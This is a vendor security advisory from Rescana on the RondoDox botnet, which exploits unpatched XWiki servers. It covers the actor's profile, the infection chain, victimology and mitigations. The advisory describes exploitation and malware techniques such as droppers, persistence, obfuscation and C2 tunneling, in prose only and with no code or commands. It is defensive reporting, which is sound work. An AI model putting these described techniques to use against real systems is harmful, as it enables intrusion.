Executive Summary

The emergence of the RondoDox botnet campaign marks a significant escalation in the exploitation of unpatched XWiki servers, leveraging known vulnerabilities to conscript these systems into a rapidly expanding botnet infrastructure. XWiki, a widely adopted open-source enterprise wiki platform, has become a high-value target due to its prevalence in knowledge management and collaboration environments across diverse sectors. The RondoDox threat actor exploits unpatched instances of XWiki by weaponizing remote code execution vulnerabilities, enabling the deployment of malicious payloads that facilitate lateral movement, data exfiltration, and further propagation of the botnet. This advisory provides a comprehensive technical analysis of the RondoDox campaign, its tactics, techniques, and procedures (TTPs), observed exploitation in the wild, victimology, and actionable mitigation strategies. Executives and technical stakeholders are urged to prioritize patch management and implement robust security controls to mitigate the risk posed by this evolving threat.

Threat Actor Profile

The RondoDox threat actor is characterized by a high degree of technical sophistication and operational agility, leveraging automated reconnaissance and exploitation frameworks to identify and compromise vulnerable XWiki servers globally. While attribution remains inconclusive, telemetry and behavioral analysis suggest that RondoDox operates as a financially motivated cybercriminal group with a focus on botnet monetization through distributed denial-of-service (DDoS) attacks, proxy rental services, and potential ransomware deployment. The group demonstrates a rapid adaptation to public disclosures of vulnerabilities, integrating new exploits into its arsenal within days of proof-of-concept (PoC) publication. RondoDox maintains a decentralized command-and-control (C2) infrastructure, utilizing fast-flux DNS and encrypted communication channels to evade detection and takedown efforts. The actor’s targeting of XWiki aligns with a broader trend of exploiting enterprise collaboration platforms to maximize impact and persistence.

Technical Analysis of Malware/TTPs

The RondoDox botnet leverages a multi-stage infection chain, beginning with the exploitation of unpatched XWiki vulnerabilities such as CVE-2023-35150 and CVE-2023-26482, which enable unauthenticated remote code execution. Upon successful exploitation, the attacker deploys a lightweight dropper that establishes initial persistence by modifying startup scripts and leveraging cron jobs or Windows Task Scheduler, depending on the underlying operating system. The dropper retrieves the primary botnet payload from a remote server, employing obfuscation techniques such as base64 encoding and custom packers to evade signature-based detection.

The core RondoDox malware exhibits modular architecture, supporting plug-ins for DDoS attack orchestration, credential harvesting, lateral movement via SMB and RDP brute-forcing, and proxy relay functionality. The malware communicates with its C2 infrastructure using HTTPS over non-standard ports, with fallback mechanisms utilizing DNS tunneling in the event of network filtering. Notably, RondoDox incorporates anti-analysis features, including sandbox evasion, process hollowing, and periodic self-updates to maintain operational resilience. The botnet’s propagation module scans for additional vulnerable XWiki instances and other web applications, leveraging known exploits to maximize infection rates.

Exploitation in the Wild

Active exploitation of unpatched XWiki servers by the RondoDox botnet has been observed since early 2024, with a marked increase following the public disclosure of critical vulnerabilities. Threat intelligence feeds and honeypot telemetry indicate that the initial infection vector typically involves automated scanning for exposed XWiki endpoints, followed by exploitation of remote code execution flaws. Compromised servers are rapidly assimilated into the botnet, with infection chains often completing within minutes of vulnerability exposure.

Incident reports highlight that RondoDox-infected servers are subsequently leveraged for secondary attacks, including DDoS campaigns targeting financial services, healthcare providers, and educational institutions. Forensic analysis reveals that the malware frequently disables security monitoring agents and modifies firewall rules to maintain persistence and facilitate outbound C2 communication. The campaign’s global footprint encompasses North America, Europe, and Asia-Pacific, with a concentration of incidents in organizations with delayed patch cycles and limited network segmentation.

Victimology and Targeting

The primary victims of the RondoDox campaign are organizations operating unpatched XWiki servers, particularly those in sectors with high reliance on collaborative knowledge management platforms. Affected industries include technology, education, healthcare, and government, with both public and private sector entities reporting incidents. The targeting appears opportunistic, driven by automated reconnaissance rather than specific industry focus, although high-value organizations with extensive digital footprints are disproportionately impacted.

Analysis of infection telemetry suggests that small and medium-sized enterprises (SMEs) are especially vulnerable due to resource constraints and limited security maturity. However, several large enterprises have also been compromised, underscoring the criticality of timely vulnerability management. The botnet’s propagation mechanisms enable rapid lateral movement within compromised networks, increasing the risk of data exfiltration, service disruption, and further malware deployment.

Mitigation and Countermeasures

To mitigate the risk posed by the RondoDox botnet, organizations must prioritize the immediate patching of all XWiki instances, ensuring that the latest security updates addressing CVE-2023-35150, CVE-2023-26482, and related vulnerabilities are applied. It is essential to conduct comprehensive vulnerability assessments of public-facing web applications, with a focus on identifying and remediating remote code execution flaws.

Network segmentation should be enforced to limit lateral movement, and access to XWiki administrative interfaces must be restricted to trusted IP ranges using firewall rules and VPN access. Security monitoring should be enhanced through the deployment of endpoint detection and response (EDR) solutions capable of identifying anomalous process behavior, unauthorized script execution, and suspicious outbound network traffic. Organizations are advised to implement application whitelisting, disable unnecessary services, and regularly audit user privileges to minimize the attack surface.

Incident response plans should be updated to include procedures for the containment and eradication of botnet infections, with emphasis on forensic analysis and system restoration from known-good backups. Threat intelligence feeds should be integrated into security operations to facilitate early detection of emerging exploitation campaigns. Finally, user awareness training should be conducted to reinforce the importance of timely patching and adherence to security best practices.

References

Public advisories and technical analyses relevant to this campaign include the official XWiki security advisories for CVE-2023-35150 and CVE-2023-26482, threat intelligence reports from leading cybersecurity vendors, and MITRE ATT&CK documentation on botnet TTPs. Additional resources include open-source PoC repositories, security community forums, and incident response case studies detailing RondoDox-related activity.

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with advanced tools to continuously monitor, assess, and mitigate cyber risks across their digital supply chains. Our platform empowers security teams to gain actionable insights, automate risk assessments, and enhance resilience against emerging threats. For more information or to discuss your organization’s cybersecurity needs, we are happy to answer questions at ops@rescana.com.